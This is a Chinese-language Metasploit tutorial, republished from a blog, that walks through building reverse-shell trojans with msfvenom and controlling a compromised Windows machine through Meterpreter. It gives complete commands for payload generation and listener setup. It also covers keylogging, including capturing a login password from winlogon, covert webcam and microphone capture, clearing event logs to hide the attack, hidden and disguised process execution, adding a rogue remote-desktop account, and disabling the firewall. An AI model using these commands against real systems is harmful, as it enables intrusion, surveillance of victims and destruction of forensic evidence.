标签：webcam exe kali 命令 键盘记录 keyscan win10 meterpreter 连接

1.msfvenom -p windows/meterpreter/reverse_tcp LHOST=<kali ip> LPORT=<本地端口号> –f exe –o <文件名>.exe #把刚才生成的文件放到目标靶机Win10系统中

2.运行msfconsole命令

4.配置参数

(1)命令： use exploit/multi/handler（选择模块）

(2)命令： set payload windows/meterpreter/reverse_tcp（选择攻击模块（meterpreter可以看桌面/shell命令模式）

(3)命令： set LhOST 192.168.32.1（目标的IP地址）

(4)命令： set lport 1111（填写刚才生成文件时的端口号）

(5)命令： show options（查看设置参数）

(6)命令： exploit -z -j（后台执行）

结束等待目标主机运行生成的程序

攻击：查看用户

(1)命令： sessions（查看上钩的用户）

(2)命令： sessions -i 1（选择需要攻击的用户，这里选择第 1 个）

出现meterpreter你就已经成功的入侵的对方的电脑

meterpreter入侵对方电脑的命令

1.监控对方电脑屏幕

命令： run vnc -i 可以看见桌面
=====================================================
0x02 Meterpreter中常用的反弹类型
1.reverse_tcp

这是一个基于TCP的反向链接反弹shell, 使用起来很稳定

（1）Linux：

使用下列命令生成一个Linux下反弹shell木马：

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.102 lport=4444 -f elf -o shell

看上图，我们可以看见目录下已经成功生成木马文件isshell。然后我们给文件加上可执行权限。然后我们打开Metasploit，使用模块handler，设置payload，注意：这里设置的payload要和我们生成木马所使用的payload一样
--------
2.reverse_http

基于http方式的反向连接，在网速慢的情况下不稳定。

payload:/windows/meterpreter/reverse_http

3.reverse_https

基于https方式的反向连接，在网速慢的情况下不稳定， https如果反弹没有收到数据，可以将监听端口换成443试试

payload:/windows/meterpreter/reverse_https

 

4.bind_tcp

这是一个基于TCP的正向连接shell，因为在内网跨网段时无法连接到attack的机器，所以在内网中经常会使用，不需要设置LHOST。

使用下列命令生成木马：

msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444 -f elf -o shell

同样道理加权限运行，不演示了
----------
15.清除事件日志

完成攻击操作之后，千万别忘了“打扫战场”。我们的所有操作都会被记录在目标系统的日志文件之中，因此我们需要在完成攻击之后使用命令“clearev”命令来清除事件日志

执行“clearev”命令，将清除事件日志。这个命令没有任何选项或参数。
------------------
4.键盘监听

Meterpreter还可以在目标设备上实现键盘记录功能，键盘记录主要涉及以下三种命令：

keyscan_start：开启键盘记录功能

keyscan_dump：显示捕捉到的键盘记录信息

keyscan_stop：停止键盘记录功能

uictl enable keyboard/mouse#接管目标主机的键盘和鼠标。

meterpreter > keyscan_start #针对远程目标主机开启键盘记录功能

Starting the keystroke sniffer...

meterpreter > keyscan_dump #存储目标主机上捕获的键盘记录

Dumping captured keystrokes...

dir <Return> cd<Ctrl> <LCtrl>

meterpreter > keyscan_stop #停止针对目标主机的键盘记录

Stopping the keystroke sniffer...
--------------------------------------
16.网络摄像头

record_mic　　　 #音频录制

webcam_chat　　　#查看摄像头接口

webcam_list　　　#查看摄像头列表

webcam_stream　　#摄像头视频获取

webcam_list

meterpreter > webcam_list

1: Creative WebCam NX Pro

2: Creative WebCam NX Pro (VFW)

meterpreter >

webcam_snap

meterpreter > webcam_snap -h

Usage: webcam_snap [options]

OPTIONS:

-h Help Banner

-i >opt> The index of the webcam to use (Default: 1)

-p >opt> The JPEG image path (Default: 'gnFjTnzi.jpeg')

-q >opt> The JPEG image quality (Default: '50')

-v >opt> Automatically view the JPEG image (Default: 'true')

meterpreter >

OPTIONS:

-h: Displays the help information for the command

-i opt: If more then 1 web cam is connected, use this option to select the device to capture the

image from

-p opt: Change path and filename of the image to be saved

-q opt: The imagine quality, 50 being the default/medium setting, 100 being best quality

-v opt: By default the value is true, which opens the image after capture

Example usage:

meterpreter > webcam_snap -i 1 -v false

[*] Starting...

[+] Got frame

[*] Stopped

Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg

meterpreter >

“webcam_snap”命令为抓取目标主机当前的摄像头拍摄到的画面，并将它以图片形式保存到本地，“webcam_snap –h”命令为查看参数的使用方法。由于我们的实验中目标机器没有摄像头，所以我们运行“webcam_snap -i 1 -v false”命令之后返回以下信息。
---------------------
19.运行程序

我们还可以使用“execute”命令在目标系统中执行应用程序。这个命令的使用方法如下：

execute -f<file> [Options]

execute -f cmd.exe -i#执行cmd.exe命令并进行交互

execute -f cmd.exe -i -t#以所有可用令牌来执行cmd命令

execute -f cmd.exe -i -H -t#创建新进程cmd.exe，-H不可见，-i交互

execute -H -i -f cmd.exe

execute -H -m -d notepad.exe-f wce.exe -a "-o wce.txt"

运行后它将执行file参数所指定的文件。可选参数如下：

-H：创建一个隐藏进程

-a：传递给命令的参数

-i：跟进程进行交互

-m：从内存中执行

-t：使用当前伪造的线程令牌运行进程

-s：在给定会话中执行进程

-f 执行的程序文件

-d 在目标主机执行时显示的进程名称（用以伪装）

-o wce.txt"是wce.exe的运行参数
------------------
20.创建账号

getgui——getgui ，为添加用户的命令，首先用“run getgui -h”查看脚本getgui的帮助信息

run getgui-e #开启远程桌面

run getgui -uexample_username -pexample_password #添加账号

调用getgui后渗透攻击模块

作用：开启目标主机远程桌面，并可添加管理员组账号

命令：

run getgui -e

开启目标主机远程桌面
----------------------------
开启目标主机的远程桌面服务后，可以添加账号以便利用

命令：

run getgui -u example_username -p example_password
执行成功，可以使用kali的rdesktop命令使用远程桌面连接目标主机

rdesktop -u kali -p meterpreter 192.168.250.176:3389
从上图可以看出这个脚本的用法是“rungetgui –u username –p password”，我添加了一个lu的用户密码为6666。从下图中可以看到用户已经添加成功。
添加完账户之后使用rdesktop命令连接一下远程主机，具体用法是“rdesktop –u username –p password IP”执行命令之后就会弹出一个窗口，只需再输入一次密码就可以进入目标机器，并对目标机器直接进行控制
利用该命令，我们还可以在目标机器上添加用户：

run getgui -u xxxxx -p xxxxx

22.绑定进程
还可以使用 run getgui -e 来开启远程桌面：
Meterpreter既可以单独运行，也可以与其他进程进行绑定。因此，我们可以让Meterpreter与类似explorer.exe这样的进程进行绑定，并以此来实现持久化。

在下面的例子中，我们会将Meterpreter跟winlogon.exe绑定，并在登录进程中捕获键盘记录。

首先，我们需要使用“ps”命令查看目标设备中运行的进程：
接下来，使用“getpid”找出需要绑定的进程，接下来，使用migrate命令+pid来绑定进程。
绑定完成之后，我们就可以开始捕获键盘数据了：
接下来，我们可以选择导出键盘记录，或者使用命令“enum_logged_on_users”来检查用户是否成功登录
等待片刻之后，使用keyscan_dump命令导出记录信息:
捕捉到的用户密码为trustno1

23.通过其 shell 来关闭防火墙

netsh adcfirewall set allprofiles state off
-----------------------------------------------------------------------------------------------

2.更多命令

还可以查看帮助文档，命令help

cmd指令:

cat 读取文件内容到屏幕

cd 更改目录

checksum 检索文件的校验和

cp 将源复制到目标

del 删除指定文件

dir 列出文件（ls 的别名）

下载 下载文件或目录

编辑 编辑文件

getlwd 打印本地工作目录

getwd 打印工作目录

lcd 更改本地工作目录

lls 列出本地文件

lpwd 打印本地工作目录

ls 列出文件

mkdir 创建目录

mv 将源移动到目标

pwd 打印工作目录

rm 删除指定文件

rmdir 删除目录

search 搜索文件

show_mount 列出所有挂载点/逻辑驱动器

upload 上传文件或目录

pkill 按名称终止进程

meterpreter命令：

keyscan_start 开始捕获击键（开始键盘记录）

keyscan_dump 转储按键缓冲（下载键盘记录）

keyscan_stop 停止捕获击键（停止键盘记录）

record_mic X秒从默认的麦克风record_mic音频记录（音频录制）

webcam_chat 开始视频聊天（视频，对方会有弹窗）

webcam_list 单摄像头（查看摄像头列表）

webcam_snap 采取快照从指定的摄像头（摄像头拍摄一张照片）

webcam_stream 播放视频流从指定的摄像头（开启摄像头监控）

enumdesktops 列出所有可访问的桌面和窗口站（窗体列表）

getdesktop 得到当前的Meterpreter桌面

reboot 重新启动远程计算机

shutdown 关闭远程计算机

shell 放入系统命令 shell

enumdesktops 列出所有可访问的桌面和窗口站

getdesktop 获取当前的meterpreter桌面

idletime 返回远程用户空闲的秒数

keyboard_send 发送击键

keyevent 发送按键事件

keyscan_dump 转储击键缓冲区

keyscan_start 开始捕获击键

keyscan_stop 停止捕获击键

mouse 发送鼠标事件

screenshare 实时观看远程用户桌面

screenshot 抓取交互式桌面的屏幕截图

setdesktop 更改 Meterpreters 当前桌面

uictl 控制一些用户界面组件

record_mic 从默认麦克风录制音频 X 秒

webcam_chat 开始视频聊天

webcam_list 列出网络摄像头

webcam_snap 从指定的网络摄像头拍摄快照

webcam_stream 播放来自指定网络摄像头的视频流

play 在目标系统上播放波形音频文件 (.wav)

getsystem 尝试将您的权限提升到本地系统的权限

execute -f notepad 打开记事本

标签：webcam,exe,kali,命令,键盘记录,keyscan,win10,meterpreter,连接
来源： https://www.cnblogs.com/Sunyu147258/p/16701580.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。